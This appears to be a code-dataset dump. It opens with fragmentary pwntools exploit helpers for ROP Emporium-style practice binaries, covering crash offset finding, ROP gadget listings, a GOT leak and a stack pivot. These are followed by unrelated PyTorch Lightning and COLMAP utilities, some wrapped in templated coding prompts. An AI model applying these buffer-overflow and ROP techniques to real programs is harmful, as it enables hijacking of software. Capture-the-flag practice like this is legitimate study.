eip_offset = cyclic_find(p.corefile.eip, alphabet='bcdefhijk')
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,533 | from pwn import *
gdbscript = '''
init-gef
continue
'''.format(**locals())
exe = './badchars'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,534 | from pwn import *
exe = './badchars'
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_r12_r13_r14_r15", pop_r12_r13_r14_r15)
info("%#x mov_r13_r12", mov_r13_r12)
info("%#x pop_r14_r15", pop_r14_r15)
info("%#x xor_r15_r14", xor_r15_r14)
info("%#x pop_rdi", pop_rdi)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RIP at the time of crashing
pattern = p.corefile.read(p.corefile.rsp, 4)
rip_offset = cyclic_find(pattern, alphabet='bcdefhijk')
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,536 | from pwn import *
exe = './badchars'
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_r12_r13_r14_r15", pop_r12_r13_r14_r15)
info("%#x mov_r13_r12", mov_r13_r12)
info("%#x pop_rdi", pop_rdi)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RIP at the time of crashing
pattern = p.corefile.read(p.corefile.rsp, 4)
rip_offset = cyclic_find(pattern, alphabet='bcdefhijk')
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,537 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './ret2csu'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,538 | from pwn import *
exe = './ret2csu'
info("%#x ret2win", ret2win)
info("%#x pop rdi; ret", pop_rdi)
info("%#x pop rbp; pop rbx; pop r12; pop r13; pop r14; pop r15; ret", pop_rbx_rbp_r12_r13_r14_r15)
info("%#x mov rdx, r15; mov rsi, r14; mov edi, r13, call QWORD PTR [r12+rbx*8]; ret", csu_mov)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,539 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './callme32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,540 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './callme'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,541 | from pwn import *
import re
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pivot32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,542 | from pwn import *
import re
exe = './pivot32'
eip_offset = find_eip(cyclic(100))
info("foothold_plt: %#x", foothold_plt)
info("foothold_got: %#x", foothold_got)
info("puts_plt: %#x", puts_plt)
info("pivot_addr: %#x", pivot_addr)
info("foothold_offset: %#x", foothold_offset)
info("ret2win_offset: %#x", ret2win_offset)
info("pop eax; ret; %#x", pop_eax)
info("xchg eax, esp; ret; %#x", xchg_eax_esp)
info("Sending first payload to leak foothold_function@got address")
info("Sending second payload to stack pivot")
info("Leaked foothold_function@got:")
info("foothold_leak: %#x", foothold_leak)
info("libpivot32_base: %#x", libpivot32_base)
info("ret2win_addr: %#x", ret2win_addr)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', "") # We need to deal with initial prompt
# Then we can send payload (when it asks for stack smash)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,543 | from pwn import *
import re
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pivot'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,544 | from pwn import *
import re
exe = './pivot'
info("foothold_plt: %#x", foothold_plt)
info("foothold_got: %#x", foothold_got)
info("puts_plt: %#x", puts_plt)
info("pivot_addr: %#x", pivot_addr)
info("foothold_offset: %#x", foothold_offset)
info("ret2win_offset: %#x", ret2win_offset)
info("pop rdi; ret; %#x", pop_rdi)
info("pop rax; ret; %#x", pop_rax)
info("xchg rax, esp; ret; %#x", xchg_rax_esp)
info("Sending first payload to leak foothold_function@got address")
info("Sending second payload to stack pivot")
info("Leaked foothold_function@got:")
info("foothold_leak: %#x", foothold_leak)
info("libpivot32_base: %#x", libpivot32_base)
info("ret2win_addr: %#x", ret2win_addr)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', "") # We need to deal with initial prompt
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,547 | from pytorch_lightning import LightningModule, Callback, Trainer
from pytorch_lightning import seed_everything
from pytorch_lightning.loggers import LightningLoggerBase
import hydra
from omegaconf import DictConfig
from typing import List
from src.utils import template_utils as utils
import warnings
def train(config: DictConfig):
if config['print_config']:
utils.print_config(config)
if "seed" in config:
seed_everything(config['seed'])
# Init PyTorch Lightning model ⚡
model: LightningModule = hydra.utils.instantiate(config['model'])
# Init PyTorch Lightning datamodule ⚡
datamodule: LightningModule = hydra.utils.instantiate(config['datamodule'])
datamodule.setup()
# Init PyTorch Lightning callbacks ⚡
callbacks: List[Callback] = []
if "callbacks" in config:
for _, cb_conf in config['callbacks'].items():
if "_target_" in cb_conf:
callbacks.append(hydra.utils.instantiate(cb_conf))
# Init PyTorch Lightning loggers ⚡
logger: List[LightningLoggerBase] = []
if "logger" in config:
for _, lg_conf in config['logger'].items():
if "_target_" in lg_conf:
logger.append(hydra.utils.instantiate(lg_conf))
# Init PyTorch Lightning trainer ⚡
trainer: Trainer = hydra.utils.instantiate(
config['trainer'], callbacks=callbacks, logger=logger
)
# Send some parameters from config to all lightning loggers
utils.log_hparams_to_all_loggers(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger
)
# Train the model
trainer.fit(model=model, datamodule=datamodule)
# Evaluate model on test set after training
# trainer.test()
# Make sure everything closed properly
utils.finish(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=callbacks,
logger=logger
)
# Return best achieved metric score for optuna
optimized_metric = config.get("optimized_metric", None)
if optimized_metric:
return trainer.callback_metrics[optimized_metric] | null |
14,548 | import os.path as osp
import time
import cv2
import torch
import numpy as np
from src.utils.colmap.read_write_model import read_model
from src.utils.data_utils import get_K_crop_resize, get_image_crop_resize
from src.utils.vis_utils import reproj
def pack_extract_data(img_path):
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
image = image[None] / 255.0
return torch.Tensor(image) | null |
14,549 | import os.path as osp
import time
import cv2
import torch
import numpy as np
from src.utils.colmap.read_write_model import read_model
from src.utils.data_utils import get_K_crop_resize, get_image_crop_resize
from src.utils.vis_utils import reproj
def pack_match_data(db_detection, query_detection, db_size, query_size):
data = {}
for k in db_detection.keys():
data[k + "0"] = db_detection[k].__array__()
for k in query_detection.keys():
data[k + "1"] = query_detection[k].__array__()
data = {k: torch.from_numpy(v)[None].float().cuda() for k, v in data.items()}
data["image0"] = torch.empty(
(
1,
1,
)
+ tuple(db_size)[::-1]
)
data["image1"] = torch.empty(
(
1,
1,
)
+ tuple(query_size)[::-1]
)
return data | null |
14,550 | from pytorch_lightning.loggers import WandbLogger
import wandb
from pytorch_lightning import Callback
import pytorch_lightning as pl
import torch
from sklearn.metrics import precision_score, recall_score, f1_score
from typing import List
import glob
import os
def get_wandb_logger(trainer: pl.Trainer) -> WandbLogger:
    """Return the WandbLogger attached to ``trainer``.

    Scans every logger registered on the trainer; if several WandbLoggers
    are present the last one wins (matches the original behavior).

    Raises:
        Exception: if no WandbLogger is attached to the trainer.
    """
    found = None
    for candidate in trainer.logger:
        if isinstance(candidate, WandbLogger):
            found = candidate
    if not found:
        raise Exception(
            "You're using wandb related callback, "
            "but WandbLogger was not found for some reason..."
        )
    return found
14,551 | import os
import logging
import subprocess
import os.path as osp
from pathlib import Path
def run_bundle_adjuster(deep_sfm_dir, ba_dir, colmap_path):
    """Refine camera extrinsics of a COLMAP model via bundle adjustment.

    Runs the ``colmap bundle_adjuster`` binary on the model stored in
    ``<deep_sfm_dir>/model`` and writes the refined model to ``ba_dir``.
    Intrinsics (focal length, principal point, extra params) are kept
    fixed; only the extrinsics are refined.

    Args:
        deep_sfm_dir: directory containing the input SfM ``model`` subdir.
        ba_dir: output directory for the bundle-adjusted model.
        colmap_path: path to the COLMAP executable.

    Exits the process with COLMAP's return code on failure.
    """
    logging.info("Running the bundle adjuster.")
    deep_sfm_model_dir = osp.join(deep_sfm_dir, 'model')
    cmd = [
        str(colmap_path), 'bundle_adjuster',
        '--input_path', str(deep_sfm_model_dir),
        '--output_path', str(ba_dir),
        '--BundleAdjustment.max_num_iterations', '150',
        '--BundleAdjustment.max_linear_solver_iterations', '500',
        # Zero tolerances: run until the iteration cap instead of
        # stopping early on convergence heuristics.
        '--BundleAdjustment.function_tolerance', '0',
        '--BundleAdjustment.gradient_tolerance', '0',
        '--BundleAdjustment.parameter_tolerance', '0',
        '--BundleAdjustment.refine_focal_length', '0',
        '--BundleAdjustment.refine_principal_point', '0',
        '--BundleAdjustment.refine_extra_params', '0',
        '--BundleAdjustment.refine_extrinsics', '1'
    ]
    logging.info(' '.join(cmd))
    ret = subprocess.call(cmd)
    if ret != 0:
        # Was: "Problem with point_triangulator, existing." — a copy-paste
        # from the triangulation step; this function runs bundle_adjuster.
        logging.warning('Problem with bundle_adjuster, exiting.')
        exit(ret)
14,552 | import os
import h5py
import logging
import tqdm
import subprocess
import os.path as osp
import numpy as np
from pathlib import Path
from src.utils.colmap.read_write_model import CAMERA_MODEL_NAMES, Image, read_cameras_binary, read_images_binary
from src.utils.colmap.database import COLMAPDatabase
The provided code snippet includes necessary dependencies for implementing the `geometric_verification` function. Write a Python function `def geometric_verification(colmap_path, database_path, pairs_path)` to solve the following problem:
Geometric verification
Here is the function:
def geometric_verification(colmap_path, database_path, pairs_path):
    """Geometrically verify matches stored in a COLMAP database.

    Runs ``colmap matches_importer`` over the image pairs listed in
    ``pairs_path``, filtering the matches in ``database_path`` with
    two-view geometry estimation.

    Exits the process with COLMAP's return code on failure.
    """
    logging.info('Performing geometric verification of the matches...')
    cmd = [
        str(colmap_path), 'matches_importer',
        '--database_path', str(database_path),
        '--match_list_path', str(pairs_path),
        '--match_type', 'pairs'
    ]
    ret = subprocess.call(cmd)
    if ret != 0:
        # Fixed typo in the log message ("existing" -> "exiting").
        logging.warning('Problem with matches_importer, exiting.')
        exit(ret)
14,553 | import os
import h5py
import logging
import tqdm
import subprocess
import os.path as osp
import numpy as np
from pathlib import Path
from src.utils.colmap.read_write_model import CAMERA_MODEL_NAMES, Image, read_cameras_binary, read_images_binary
from src.utils.colmap.database import COLMAPDatabase
# Index the COLMAP camera models by their human-readable name
# (e.g. "PINHOLE" -> model record); dict comprehension instead of
# dict([...]) around a list comprehension (flake8-comprehensions C404).
CAMERA_MODEL_NAMES = {
    camera_model.model_name: camera_model for camera_model in CAMERA_MODELS
}
def read_cameras_binary(path_to_model_file):
    """Parse a COLMAP ``cameras.bin`` file into a dict of Camera records.

    see: src/base/reconstruction.cc
        void Reconstruction::WriteCamerasBinary(const std::string& path)
        void Reconstruction::ReadCamerasBinary(const std::string& path)

    Returns:
        dict mapping camera_id -> Camera.
    """
    cameras = {}
    with open(path_to_model_file, "rb") as fid:
        num_cameras = read_next_bytes(fid, 8, "Q")[0]
        for _ in range(num_cameras):
            # Fixed-size header: camera_id, model_id, width, height.
            props = read_next_bytes(
                fid, num_bytes=24, format_char_sequence="iiQQ")
            cam_id = props[0]
            model = CAMERA_MODEL_IDS[props[1]]
            width, height = props[2], props[3]
            # Variable-size tail: one double per model parameter.
            params = read_next_bytes(
                fid,
                num_bytes=8 * model.num_params,
                format_char_sequence="d" * model.num_params,
            )
            cameras[cam_id] = Camera(
                id=cam_id,
                model=model.model_name,
                width=width,
                height=height,
                params=np.array(params),
            )
    assert len(cameras) == num_cameras
    return cameras
def read_images_binary(path_to_model_file):
    """Parse a COLMAP ``images.bin`` file into a dict of Image records.

    see: src/base/reconstruction.cc
        void Reconstruction::ReadImagesBinary(const std::string& path)
        void Reconstruction::WriteImagesBinary(const std::string& path)

    Returns a dict mapping image_id -> Image (pose, camera id, name and
    2D keypoints with their associated 3D point ids).
    """
    images = {}
    with open(path_to_model_file, "rb") as fid:
        num_reg_images = read_next_bytes(fid, 8, "Q")[0]
        for _ in range(num_reg_images):
            # Fixed-size record header: image_id (int), qvec (4 doubles),
            # tvec (3 doubles), camera_id (int).
            binary_image_properties = read_next_bytes(
                fid, num_bytes=64, format_char_sequence="idddddddi")
            image_id = binary_image_properties[0]
            qvec = np.array(binary_image_properties[1:5])  # 4-element rotation quaternion
            tvec = np.array(binary_image_properties[5:8])  # 3-element translation
            camera_id = binary_image_properties[8]
            image_name = ""
            # The image name is stored as a null-terminated byte string;
            # read one char at a time until the terminator.
            current_char = read_next_bytes(fid, 1, "c")[0]
            while current_char != b"\x00":  # look for the ASCII 0 entry
                image_name += current_char.decode("utf-8")
                current_char = read_next_bytes(fid, 1, "c")[0]
            num_points2D = read_next_bytes(fid, num_bytes=8,
                                           format_char_sequence="Q")[0]
            # Each 2D point is packed as (x, y, point3D_id): two doubles
            # plus a signed 8-byte id, 24 bytes per point.
            x_y_id_s = read_next_bytes(fid, num_bytes=24*num_points2D,
                                       format_char_sequence="ddq"*num_points2D)
            # De-interleave the flat (x, y, id, x, y, id, ...) tuple.
            xys = np.column_stack([tuple(map(float, x_y_id_s[0::3])),
                                   tuple(map(float, x_y_id_s[1::3]))])
            point3D_ids = np.array(tuple(map(int, x_y_id_s[2::3])))
            images[image_id] = Image(
                id=image_id, qvec=qvec, tvec=tvec,
                camera_id=camera_id, name=image_name,
                xys=xys, point3D_ids=point3D_ids)
    return images
class COLMAPDatabase(sqlite3.Connection):
    """Thin wrapper around a COLMAP SQLite database.

    Provides helpers to create the COLMAP schema and insert cameras,
    images, keypoints, descriptors, matches and two-view geometries.
    Obtain instances via :meth:`connect`, which installs this class as
    the sqlite3 connection factory.
    """

    @staticmethod
    def connect(database_path):
        """Open (or create) a COLMAP database at ``database_path``."""
        # Was a plain function in the class body; marked @staticmethod so
        # it can also be called on an instance without binding errors.
        return sqlite3.connect(str(database_path), factory=COLMAPDatabase)

    def __init__(self, *args, **kwargs):
        super(COLMAPDatabase, self).__init__(*args, **kwargs)
        # Bind schema-creation helpers lazily: the CREATE_* SQL constants
        # (defined at module level) are only resolved when a helper is
        # actually invoked, not at construction time.
        self.create_tables = lambda: self.executescript(CREATE_ALL)
        self.create_cameras_table = \
            lambda: self.executescript(CREATE_CAMERAS_TABLE)
        self.create_descriptors_table = \
            lambda: self.executescript(CREATE_DESCRIPTORS_TABLE)
        self.create_images_table = \
            lambda: self.executescript(CREATE_IMAGES_TABLE)
        self.create_two_view_geometries_table = \
            lambda: self.executescript(CREATE_TWO_VIEW_GEOMETRIES_TABLE)
        self.create_keypoints_table = \
            lambda: self.executescript(CREATE_KEYPOINTS_TABLE)
        self.create_matches_table = \
            lambda: self.executescript(CREATE_MATCHES_TABLE)
        self.create_name_index = lambda: self.executescript(CREATE_NAME_INDEX)

    def add_camera(self, model, width, height, params,
                   prior_focal_length=False, camera_id=None):
        """Insert a camera row; returns the assigned camera id."""
        params = np.asarray(params, np.float64)
        cursor = self.execute(
            "INSERT INTO cameras VALUES (?, ?, ?, ?, ?, ?)",
            (camera_id, model, width, height, array_to_blob(params),
             prior_focal_length))
        return cursor.lastrowid

    def add_image(self, name, camera_id,
                  prior_q=None, prior_t=None, image_id=None):
        """Insert an image row; returns the assigned image id.

        ``prior_q``/``prior_t`` default to zero quaternion/translation.
        """
        # Avoid mutable ndarray default arguments (shared across calls);
        # the effective defaults are unchanged.
        prior_q = np.zeros(4) if prior_q is None else prior_q
        prior_t = np.zeros(3) if prior_t is None else prior_t
        cursor = self.execute(
            "INSERT INTO images VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
            (image_id, name, camera_id, prior_q[0], prior_q[1], prior_q[2],
             prior_q[3], prior_t[0], prior_t[1], prior_t[2]))
        return cursor.lastrowid

    def add_keypoints(self, image_id, keypoints):
        """Insert the keypoints array (N x 2/4/6) for ``image_id``."""
        assert(len(keypoints.shape) == 2)
        assert(keypoints.shape[1] in [2, 4, 6])
        keypoints = np.asarray(keypoints, np.float32)
        self.execute(
            "INSERT INTO keypoints VALUES (?, ?, ?, ?)",
            (image_id,) + keypoints.shape + (array_to_blob(keypoints),))

    def add_descriptors(self, image_id, descriptors):
        """Insert the uint8 descriptor matrix for ``image_id``."""
        descriptors = np.ascontiguousarray(descriptors, np.uint8)
        self.execute(
            "INSERT INTO descriptors VALUES (?, ?, ?, ?)",
            (image_id,) + descriptors.shape + (array_to_blob(descriptors),))

    def add_matches(self, image_id1, image_id2, matches):
        """Insert raw matches (N x 2 index pairs) between two images."""
        assert(len(matches.shape) == 2)
        assert(matches.shape[1] == 2)
        # COLMAP stores each pair under a canonical (smaller id first)
        # pair id, so swap the match columns when the ids are reversed.
        if image_id1 > image_id2:
            matches = matches[:,::-1]
        pair_id = image_ids_to_pair_id(image_id1, image_id2)
        matches = np.asarray(matches, np.uint32)
        self.execute(
            "INSERT INTO matches VALUES (?, ?, ?, ?)",
            (pair_id,) + matches.shape + (array_to_blob(matches),))

    def add_two_view_geometry(self, image_id1, image_id2, matches,
                              F=np.eye(3), E=np.eye(3), H=np.eye(3), config=2):
        """Insert verified matches plus the F/E/H two-view geometry."""
        assert(len(matches.shape) == 2)
        assert(matches.shape[1] == 2)
        # Same canonical pair-id convention as add_matches.
        if image_id1 > image_id2:
            matches = matches[:,::-1]
        pair_id = image_ids_to_pair_id(image_id1, image_id2)
        matches = np.asarray(matches, np.uint32)
        F = np.asarray(F, dtype=np.float64)
        E = np.asarray(E, dtype=np.float64)
        H = np.asarray(H, dtype=np.float64)
        self.execute(
            "INSERT INTO two_view_geometries VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
            (pair_id,) + matches.shape + (array_to_blob(matches), config,
             array_to_blob(F), array_to_blob(E), array_to_blob(H)))
The provided code snippet includes necessary dependencies for implementing the `create_db_from_model` function. Write a Python function `def create_db_from_model(empty_model, database_path)` to solve the following problem:
Create COLMAP database file from empty COLMAP binary file.
Here is the function:
def create_db_from_model(empty_model, database_path):
    """Create a COLMAP database pre-populated from an empty binary model.

    Reads ``cameras.bin`` / ``images.bin`` under ``empty_model`` and
    inserts the corresponding camera and image rows into a database at
    ``database_path``.

    Returns:
        dict mapping image name -> image id.
    """
    if database_path.exists():
        # Only warns: the rows below are still inserted into the
        # existing file, matching the original behavior.
        logging.warning('Database already exists.')

    cameras = read_cameras_binary(str(empty_model / 'cameras.bin'))
    images = read_images_binary(str(empty_model / 'images.bin'))

    db = COLMAPDatabase.connect(database_path)
    db.create_tables()

    for cam_id, cam in cameras.items():
        db.add_camera(
            CAMERA_MODEL_NAMES[cam.model].model_id,
            cam.width,
            cam.height,
            cam.params,
            camera_id=cam_id,
            prior_focal_length=True,
        )
    for img_id, img in images.items():
        db.add_image(img.name, img.camera_id, image_id=img_id)

    db.commit()
    db.close()
    return {img.name: img_id for img_id, img in images.items()}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.